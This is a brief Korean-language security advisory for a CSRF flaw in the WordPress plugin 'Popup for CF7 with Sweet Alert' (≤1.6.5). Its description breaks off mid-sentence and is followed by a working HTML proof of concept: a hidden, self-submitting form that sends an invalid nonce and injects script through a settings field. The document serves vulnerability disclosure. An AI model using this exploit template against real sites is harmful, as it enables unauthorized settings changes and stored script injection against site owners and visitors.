
Popup for CF7 with Sweet Alert <= 1.6.5 - 크로스 사이트 요청 위조
Popup for CF7 with Sweet Alert <= 1.6.5 - 크로스 사이트 요청 위조
https://wordpress.org/plugins/cf7-sweet-alert-popup/
이 플러그인의 설정 핸들러는 nonce 검증에 논리 오류가 있어 모든 CSRF 보호가 비활성화됩니다. 인증되지 않은 공격자는 숨겨진 자동 제출 폼이 포함된 악성 페이지를 인증된 관리자가 방문하도록 유도하여 이 취약점을 악용할 수 있으며, 이를 통해 플러그인 설정을 임의로 수정할 수 있습니다. 제출된 값은 정제 없이 저장되고 wp_head를 통해 모든 프런트엔드 페이지의
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>
<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
method="POST" id="csrf" target="hiddenframe">
<input name="cf7simplePopupWidth" value="500;alert(document.domain)">
<input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>